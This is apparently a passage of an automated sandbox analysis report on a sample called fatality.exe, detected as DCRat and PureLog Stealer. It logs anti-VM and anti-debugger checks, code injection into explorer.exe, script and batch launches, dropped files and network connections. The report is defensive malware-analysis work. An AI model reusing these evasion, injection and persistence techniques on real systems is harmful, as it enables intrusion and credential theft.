                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeMemory allocated: 1680000 memory reserve | memory write watch
                                      Source: C:\blockcomSession\containerReview.exeMemory allocated: 1B300000 memory reserve | memory write watch
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeMemory allocated: BE0000 memory reserve | memory write watch
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeMemory allocated: 1A4E0000 memory reserve | memory write watch
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeMemory allocated: F10000 memory reserve | memory write watch
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeMemory allocated: 1AD80000 memory reserve | memory write watch
                                      Source: C:\blockcomSession\Idle.exeMemory allocated: 1240000 memory reserve | memory write watch
                                      Source: C:\blockcomSession\Idle.exeMemory allocated: 1AFC0000 memory reserve | memory write watch
                                      Source: C:\blockcomSession\Idle.exeMemory allocated: 9D0000 memory reserve | memory write watch
                                      Source: C:\blockcomSession\Idle.exeMemory allocated: 1A710000 memory reserve | memory write watch
                                      Source: C:\blockcomSession\smss.exeMemory allocated: 15F0000 memory reserve | memory write watch
                                      Source: C:\blockcomSession\smss.exeMemory allocated: 1B0A0000 memory reserve | memory write watch
                                      Source: C:\blockcomSession\smss.exeMemory allocated: 3100000 memory reserve | memory write watch
                                      Source: C:\blockcomSession\smss.exeMemory allocated: 1B100000 memory reserve | memory write watch
                                      Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00403A5C sgdt fword ptr [eax]0_2_00403A5C
                                      Source: C:\blockcomSession\containerReview.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeThread delayed: delay time: 922337203685477
                                      Source: C:\blockcomSession\Idle.exeThread delayed: delay time: 922337203685477
                                      Source: C:\blockcomSession\Idle.exeThread delayed: delay time: 922337203685477
                                      Source: C:\blockcomSession\smss.exeThread delayed: delay time: 922337203685477
                                      Source: C:\blockcomSession\smss.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exeWindow / User API: threadDelayed 646Jump to behavior
                                      Source: C:\Users\user\Desktop\fatality.exe Window / User API: threadDelayed 678Jump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeWindow / User API: threadDelayed 816Jump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeWindow / User API: foregroundWindowGot 581Jump to behavior
                                      Source: C:\Windows\Resources\svchost.exeWindow / User API: threadDelayed 1144Jump to behavior
                                      Source: C:\Windows\Resources\svchost.exeWindow / User API: threadDelayed 523Jump to behavior
                                      Source: C:\Windows\Resources\svchost.exeWindow / User API: foregroundWindowGot 1046Jump to behavior
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeDropped PE file which has not been started: C:\Users\user\Desktop\zRrwKlet.logJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeDropped PE file which has not been started: C:\Users\user\Desktop\FJTVnRjh.logJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeDropped PE file which has not been started: C:\Users\user\Desktop\hEPrrPJe.logJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZKzjsAAu.logJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeDropped PE file which has not been started: C:\Users\user\Desktop\SdSCeHzI.logJump to dropped file
                                      Source: C:\blockcomSession\containerReview.exeDropped PE file which has not been started: C:\Users\user\Desktop\XWvbHmEw.logJump to dropped file
                                      Source: C:\Users\user\Desktop\fatality.exeAPI coverage: 8.7 %
                                      Source: C:\Windows\Resources\Themes\explorer.exe TID: 7544Thread sleep count: 816 > 30Jump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exe TID: 7544Thread sleep count: 124 > 30Jump to behavior
                                      Source: C:\Windows\Resources\svchost.exe TID: 7596Thread sleep count: 1144 > 30Jump to behavior
                                      Source: C:\Windows\Resources\svchost.exe TID: 7596Thread sleep count: 523 > 30Jump to behavior
                                      Source: C:\blockcomSession\containerReview.exe TID: 7888Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe TID: 7360Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe TID: 4928Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\blockcomSession\Idle.exe TID: 5440Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\blockcomSession\Idle.exe TID: 8092Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\blockcomSession\smss.exe TID: 5024Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\blockcomSession\smss.exe TID: 7996Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\blockcomSession\containerReview.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\blockcomSession\Idle.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\blockcomSession\Idle.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\blockcomSession\smss.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\blockcomSession\smss.exeFile Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008EA69B FindFirstFileW,FindFirstFileW,1_2_008EA69B
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_04936863 NtQueryInformationProcess,GetSystemInfo,1_2_04936863
                                      Source: C:\blockcomSession\containerReview.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeThread delayed: delay time: 922337203685477
                                      Source: C:\blockcomSession\Idle.exeThread delayed: delay time: 922337203685477
                                      Source: C:\blockcomSession\Idle.exeThread delayed: delay time: 922337203685477
                                      Source: C:\blockcomSession\smss.exeThread delayed: delay time: 922337203685477
                                      Source: C:\blockcomSession\smss.exeThread delayed: delay time: 922337203685477
                                      Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user
                                      Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\Documents\desktop.ini
                                      Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\AppData
                                      Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\AppData\Local\Temp
                                      Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                      Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\AppData\Local
                                      Source: fatality.exe , 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: VBoxService.exe
                                      Source: fatality.exe , 00000001.00000003.1715310233.0000000002DCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`Ee%SystemRoot%\system32\mswsock.dll
                                      Source: fatality.exe , fatality.exe , 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: ~VirtualMachineTypes
                                      Source: fatality.exe , fatality.exe , 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2940622995.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                      Source: wscript.exe, 00000006.00000003.1822031745.000000000349A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                      Source: fatality.exe , 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: VMWare
                                      Source: fatality.exe , 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                                      Source: fatality.exe , 00000001.00000003.1715310233.0000000002DCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\
                                      Source: fatality.exe , 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: &VBoxService.exe
                                      Source: containerReview.exe, 0000000D.00000002.1906268968.0000000003438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Oaa7aaa88d3a38afffd0fc4037a0f3870f888d81451df92c17a8ef3701b17cc498beb201989a8dabhgfSw<
                                      Source: C:\Users\user\Desktop\fatality.exeProcess information queried: ProcessInformationJump to behavior

                                      Anti Debugging

                                      barindex
                                      Hides threads from debuggers
                                      Source: C:\Users\user\Desktop\fatality.exe Thread information set: HideFromDebuggerJump to behavior
                                      Tries to detect sandboxes and other dynamic analysis tools (window names)
                                      Source: C:\Users\user\Desktop\fatality.exe Open window title or class name: ollydbg
                                      Source: C:\Users\user\Desktop\fatality.exe File opened: SIWDEBUG
                                      Source: C:\Users\user\Desktop\fatality.exe File opened: NTICE
                                      Source: C:\Users\user\Desktop\fatality.exe File opened: SICE
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00907DEE mov eax, dword ptr fs:[00000030h]1_2_00907DEE
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0493606C mov eax, dword ptr fs:[00000030h]1_2_0493606C
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_04936391 mov eax, dword ptr fs:[00000030h]1_2_04936391
                                      Source: C:\blockcomSession\containerReview.exeProcess token adjusted: Debug
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess token adjusted: Debug
                                      Source: C:\blockcomSession\Idle.exeProcess token adjusted: Debug
                                      Source: C:\blockcomSession\Idle.exeProcess token adjusted: Debug
                                      Source: C:\blockcomSession\smss.exeProcess token adjusted: Debug
                                      Source: C:\blockcomSession\smss.exeProcess token adjusted: Debug
                                      Source: C:\blockcomSession\containerReview.exeMemory allocated: page read and write | page guard

                                      HIPS / PFW / Operating System Protection Evasion

                                      barindex
                                      System process connects to network (likely due to code injection or exploit)
                                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 74.125.133.82 80Jump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 64.233.167.82 80Jump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 66.102.1.82 80Jump to behavior
                                      Injects code into the Windows Explorer (explorer.exe)
                                      Source: C:\Windows\System32\svchost.exeMemory written: PID: 7892 base: 1C0000 value: 00
                                      Source: C:\Windows\System32\svchost.exeMemory written: PID: 7892 base: 3662D8 value: 00
                                      Source: C:\Windows\System32\svchost.exeMemory written: PID: 7892 base: 3671E8 value: 00
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008FB7E0 __EH_prolog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItemTextW,KiUserCallbackDispatcher,GetDlgItem,SendMessageW,SendMessageW,SetFocus,_swprintf,_swprintf,_swprintf,ShellExecuteExW,_swprintf,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongW,SetWindowLongW,SetDlgItemTextW,_wcslen,_swprintf,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetWindowTextW,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,1_2_008FB7E0
                                      Source: C:\Users\user\Desktop\fatality.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" Jump to behavior
                                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "Jump to behavior
                                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
                                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockcomSession\containerReview.exe "C:\blockcomSession/containerReview.exe"
                                      Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline"
                                      Source: C:\blockcomSession\containerReview.exeProcess created: unknown unknown
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD8F5.tmp" "c:\Windows\System32\CSC8BED934F688E46C294B230B686E2243F.TMP"
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008FF654 cpuid 1_2_008FF654
                                      Source: C:\blockcomSession\containerReview.exeQueries volume information: C:\blockcomSession\containerReview.exe VolumeInformation
                                      Source: C:\blockcomSession\containerReview.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeQueries volume information: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe VolumeInformation
                                      Source: C:\blockcomSession\Idle.exeQueries volume information: C:\blockcomSession\Idle.exe VolumeInformation
                                      Source: C:\blockcomSession\Idle.exeQueries volume information: C:\blockcomSession\Idle.exe VolumeInformation
                                      Source: C:\blockcomSession\smss.exeQueries volume information: C:\blockcomSession\smss.exe VolumeInformation
                                      Source: C:\blockcomSession\smss.exeQueries volume information: C:\blockcomSession\smss.exe VolumeInformation
                                      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                      Stealing of Sensitive Information

                                      barindex
                                      Yara detected DCRat
                                      Source: Yara matchFile source: 0000000D.00000002.1915424378.000000001346B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: Process Memory Space: containerReview.exe PID: 7868, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe PID: 7656, type: MEMORYSTR
                                      Yara detected PureLog Stealer
                                      Source: Yara matchFile source: fatality.exe, type: SAMPLE
                                      Source: Yara matchFile source: 1.3.fatality.exe .57e06fb.1.raw.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 1.3.fatality.exe .6f796fb.0.raw.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 13.0.containerReview.exe.d80000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 1.3.fatality.exe .57e06fb.1.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 1.3.fatality.exe .6f796fb.0.unpack, type: UNPACKEDPE
